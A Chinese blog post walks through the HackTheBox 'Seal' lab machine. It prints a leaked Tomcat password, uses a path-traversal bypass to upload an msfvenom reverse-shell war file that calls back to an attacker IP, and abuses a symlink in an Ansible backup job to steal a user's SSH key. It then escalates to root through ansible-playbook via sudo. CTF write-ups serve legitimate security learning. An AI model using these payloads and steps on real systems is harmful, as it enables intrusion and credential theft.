HackTheBox::Seal

最新推荐文章于 2022-11-28 00:03:43 发布
最新推荐文章于 2022-11-28 00:03:43 发布
阅读量3.9k 收藏 1
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127490665
版权

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.250
image.png
nmap -Pn -p22,443,8080 -sCV 10.10.10.250
image.png
将seal.htb添加到hosts文件中。
查看443端口对应的界面,未发现可利用的点。
image.png
查看8080端口,是一个类似git仓库的登录界面。
image.png
尝试弱口令失败后,注册一个账号进行登录,注册处有一个上传图片的地方,尝试进行文件上传失败。
image.png
使用注册后的账号成功登录,通过查看仓库,发现使用了tomcat,并且根据提示内容看到使用了nginx作为负载均衡。查看仓库中的tomcat-users.xml文件,未发现账号密码信息。最终通过commit,找到了升级后的tomcat-users.xml文件,得到了tomcat的账号密码。
tomcat/42MrHBf*z8{Z%
image.png

0x01 漏洞利用

得到账号密码后,则尝试进行登录,最终在443端口的路径/manager/status出登录得到的账号密码
image.png
登录管理后台后,未发现可以上传war包的地方,继续进行尝试。
尝试访问路径,都会提示403,最后发现了tomcat的一个路径绕过漏洞。
https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/
尝试绕过,看是否能进行文件上传,最终得到文件上传的路径。
image.png
生成war包进行上传

msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.14.14" LPORT=4444 -f war > shell.war

image.png
此处上传需要使用burp进行抓包改路径并进行绕过,否则会上传失败。
image.png
访问路径/shell,成功得到了shell
image.png

python3 -c 'import pty; pty.spawn("/bin/bash")'

由于tomcat用户权限较低,因此需要先将用户的权限提升为luis
image.png

0x02 权限提升

find / -user luis 2>/dev/null | grep -vE 'proc|/\.'

在路径/opt/backups/playbook中发现一个run.yml文件。
image.png
通过相关参考发现这个yml文件是在做备份的功能,且权限为luis。
https://docs.ansible.com/ansible/2.3/synchronize_module.html
此处漏洞利用思路为,将luis的ssh_keyjinxing进行备份,通过查看备份文件得到key,最后使用ssh登录luis用户。

ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
ls -al /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/

image.png

ls /opt/backups/archives
cp /opt/backups/archives/backup-2021-11-24-02:36:34.gz ./backup.tar.gz
tar -xzvf backup.tar.gz

image.png
得到ssh_key
image.png
使用ssh进行登录
image.png
使用sudo -l查看相关权限
image.png
参考https://gtfobins.github.io/gtfobins/ansible-playbook/
image.png

aya3t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
插件8:拼写检查
Sean's Technology Blog
10-05 89万+
<?php // Plug-in 8: Spell Check // This is an executable example with additional code supplied // To obtain just the plug-ins please click
apphack-workshop:此仓库包含完成Apphack Terraform Workshop所需的文件!
03-20
Apphack Terraform挑战 在这个Terraform挑战中,您将必须将一些基础架构组件部署到主要的云提供商: 。您无需成为AWS的专家即可完成本研讨会,因为重点是学习Terraform。但是,任何使用这些工具的经验一定会有所帮助。 为了帮助您构建最终解决方案,此挑战将经历不同的阶段。您经历的阶段越多,基础架构将变得越复杂,并且您将越接近最终解决方案。 对于这个挑战,我们将使用 0.14.8 。 常问问题 我没有参加Apphack研讨会。我该如何应对这一挑战? 为了应对这一挑战,您将必须提供与活动期间与会人员相同的基础基础设施Slalom Build。如果时间允许,我们可能会提供一个教程供您参考此仓库,以配置您自己的基本基础结构。 我听说有Terraform的更高版本发布。我们会用它们吗? 否,为简便起见,我们将继续使用0.14.8版本 入门 您无需在计算机上安装Terrafo
Github-Contribution-Hack:此仓库包含GitHub贡献图黑客程序
05-08
简介ContribHack 此存储库包含GitHub贡献图黑客程序。 如何使用它? 将存储库下载/克隆到您的计算机。 将文件从文件夹复制到所需的存储库中。 初始化仓库: npm init 填写npm init要求的字段。 安装要求(在下文中提及)。 最后运行: node index.js 直到当前日期为止,这都会用空的提交填充回购。 由于未提供任何病毒码文件,因此它将随机填充。 您还可以通过更改index.js文件最后一行中的'makeCommit'函数中的次数来调整要推送的提交次数。 制作自定义图案 模式文件就像一个尺寸为7 * X的网格。 (7行,X> 0列) 网格中的每个单元代表一天要进行的提交次数。 要求 npm i jsonfile npm i simple-git
Hack the Box Seal 靶机渗透
Shadow的博客
07-26 873
Seal 靶机渗透 目标:得到root权限,取得user.txt,root.txt 作者:shadow 时间:2021-07-26 请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 尝试访问8080端口,提示我们注册帐号,注册帐号后进入页面 Deploy updated tomcat configuration. Disable manager and host-manager. 从页面提示可以得.
hack_warspear:这个仓库是为黑客战争武器而创建的
05-05
hack_warspear 0x01:必要工具 1.immunity debugger 之所以选择 immunity 而不用od是因为这个调试器支持python,实现用python来简化一些重复性工作,比如在断点时候打印一些寄存器信息,内存信息等等,虽然od应该也可以做,不过对我这种不太习惯的人来说学习成本有点高。 2.cheat engine 郁金香老师的外挂视频教程中也经常使用的一个查基址,甚至调试的软件。而且我发现ce也支持脚本语言,你是可以通过编写lua脚本来实现很多功能,比如查看堆栈等等 0x02:目录结构 GameData InjectDll UpdateBase hackWarspear immunity:该目录存放为immunity debugger写的一些python脚本 info:该目录存放一些lua脚本及其他一些调试中间的信息记录 上面前面4个目录是当时写的外挂软件目
Hack-the-Dot:破解 Dot 仓库
06-17
项目文件 在活动开始时,所有团队都被告知一个单一的高级域名,以便为其构建一些东西。 然后他们有两个小时的时间来设计一个受该域启发的功能站点。 哪个团队为该领域构建了最有创意和最有趣的想法。 参赛者将根据功能、设计、幽默和创意域名解释进行评判。
hacktoberfest-2020:一个开放的公共仓库为2020年hacktoberfest做出贡献
03-08
hacktoberfest-2020 将于2020年慕尼黑啤酒节开放的公众仓库 如果您是第一次参加hacktoberfest,则此仓库适合您 该怎么办? 分叉此回购 编辑main.js 将您的照片添加到/ images文件夹 在contributors.txt中添加您的名字 提交并推送 发送请求请求 拉入请求被接受后,你的名字将显示在这里 贡献步骤 您可以在main.js的开头找到以下行 let contributers = [ ] 这些括号内将有信息 let contributers = [ { details of contributer 1 } , { details of contributer 2 } ] 在上一个贡献者之后,通过以下逗号填写以下格式的信息 { "name" : "YOUR NAME" , "college
Hack The Box】linux练习-- seal
人间体佐菲的博客
11-28 650
Hack The Box】linux练习-- seal
BZOJ1695 : [Usaco2007 Demo]Walk the Talk
weixin_30319153的博客
06-20 1007
观察单词表可以发现: 对于长度为3的单词,前两个字母相同的单词不超过7个 对于长度为4的单词,前两个字母相同的单词不超过35个 于是首先$O(26*26*nm)$预处理出 s1[x][i][j]表示(i,j)右上角里面字母x的出现次数 s2[x][y][i][j]表示(i,j)右上角里面单词xy的出现次数 枚举一个点,计算长度为1的单词的出现次数 枚举两个点,计算长度为2...
不同游戏的不同反作弊引擎
做一个快乐学习者
05-06 3628
The aim of this topic is to create a complete index of all known (and less known) anti-cheats and the games they are used for.Input is appreciated Advanced ProtectoR (Discontinued) BattlEye Blac...
hackgt21-whispermom:HackGT'21的临时仓库
03-14
耳语妈妈 HealthHackGT'21一个可让您在实时任何用户状态的应用程序 必备软件 节点JS 纱线(可选) 运行项目 为了在您的计算机上运行该应用程序,请按照以下给定步骤进行操作: 运行以下任一命令以安装依赖项 npm install 或者 yarn 如果您只想使用在命令行中运行的应用程序,然后在网络浏览器中打开localhost:9000 yarn start ELSE 3.在注册。 创建一个新的应用程序以获取API密钥,secret和appId。 用您的值替换server.js文件中用于推送器初始化的相应密钥,secret和appId: var pusher = new Pusher ( { appId : '<your>' , key : '<your>' , secret : '<your-app-s
QHack:QHack的官方仓库—量子机器学习黑客马拉松
03-04
注意:在我们考虑QHack Open Hackathon提交时,此存储库已被冻结。 希望您喜欢这次活动! 欢迎来到量子机器学习黑客 ! 我们很高兴能有机会与如此众多的参与者见面并一起工作,我们很高兴在活动期间与大家互动。 今年的活动包括三个主要部分: :我们将在进行直播。 与我们一起进行为期三天的演讲,演讲嘉宾来自一组令人惊异的演讲者。 :通过解决所有技能水平的一系列QML挑战问题来建立自己的技能。 :向世界展示和可以做什么! 梦想您自己的黑客马拉松项目,或者从我们的种子创意之一开始。 最新的活动时间表可在找到。 动力和奖品 QHack由我们的赞助商提供了一些惊人的好东西和奖品。 适用于AWS的积分 赚取$ 250的AWS赠金:2月19日直播结束时,记分板上的前80名团队将获得$ 250的赠金,以帮助他们在AWS上构建他们的Open Hackathon解决方案。 团队可以将积
IndustryHack:此仓库供MS Industry Hack结果提交
05-14
工业界 此仓库供MS Industry Hack参考和结果提交。 在为Hack上传结果之前,请进入正确的目录并遵循该目录中的README.md 。 Azure AI平台参考 以下是数据科学的完整生命周期,您可以在Azure上找到许多服务来帮助您完成整个生命周期。 Azure自定义视觉服务 Azure机器学习Studio Azure机器学习服务 Azure深度学习VM(DLVM)和GPU 用于文本分析的Azure机器学习包 适用于计算机视觉Azure机器学习包 用于预测Azure机器学习包 Azure计算和数据平台参考 您还可以利用Azure计算和数据服务来部署解决方案。 Azure应用服务 Azure SQL数据库 Azure MySQL数据库 Azure存储 Azure Cosmos DB Azure HDInsight参考 Azure容器服务参考 Azure IoT服务 您还可以
RiseUp:NP开发人员团队针对Hack36 4.0的官方仓库
04-11
升起 NP开发人员团队针对Hack36 4.0的官方仓库 介绍: 这是一个自我护理应用程序,主要专注于降低用户的压力水平。 该应用程序可识别用户的心情,并以音乐,视频,书籍和兴趣爱好的形式建议相关措施,以使用户平静下来,并在遇险时提示受信任的联系人。 该应用程序将对患有抑郁症,焦虑症和惊恐发作的人有益,因为它还可以在用户需要时向注册医疗专业人员提供访问权限。 目录: 该应用程序的主要功能是: 通过在手机解锁期间单击他/她的图像并通过ML识别当前的心情来识别用户的心情。 识别出心情后,该应用会建议相关的音乐,视频,书籍和活动,这些内容可以使用户感到高兴并激发自己的心情。 如果用户过度烦恼,则该应用程序提供了一项功能,以通知亲朋好友,他们可以在极度痛苦的时候伸出援手。 该应用程序还允许其他用户通过共享数据来检查朋友的心理健康状况。 准备用户的整体心理健康状况的图形分析,通过该图形
The Matrix-1 Transcript
JoeM - Holy Joe's Blog CSDN Aggregation
04-15 6457
The Matrix-1 Transcript Table of ContentsTable of ContentsChapter One: Trinity in a JamChapter Two: Impossible PursuitChapter Three: Follow InstructionsChapter Four: The Question
SEAL示例:Microsoft SEAL学习
02-09
SEAL示例 Microsoft SEAL学习 @ [目录] 说明 使用的HE方案是CKKS / | Encryption parameters : | scheme: CKKS | poly_modulus_degree: 8192 | coeff_modulus size: 200 ( 60 + 40 + 40 + 60 ) bits | scale: pow( ...
seal:Go语言中的rtmp服务器
05-16
Seal是用go语言编写的rtmp服务器,主要指rtmp服务器开源 用法 建造 下载 go path ,运行go build 您还可以使用跨平台构建,例如在Mac上构建linux版本,请运行cross_platform_linux 运行控制台模式 ./seal -c seal....
SEAL:Microsoft SEAL是易于使用且功能强大的同态加密库
04-06
微软海豹突击队Microsoft SEAL是由Microsoft的密码学和隐私研究小组开发的易于使用的开放源代码(由)同态加密库。 Microsoft SEAL用现代标准C ++编写,易于编译并在许多不同的环境中运行。 有关Microsoft SEAL项目...
ModuleNotFoundError: No module named 'seal'
最新发布
05-21
在这个错误信息中,"No module named 'seal'"表示Python在导入模块时无法找到名为'seal'的模块。 通常出现这个错误的原因有以下几种: 1. 模块名称错误:可能是模块名称拼写错误或者大小写错误。 2. 模块未安装:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值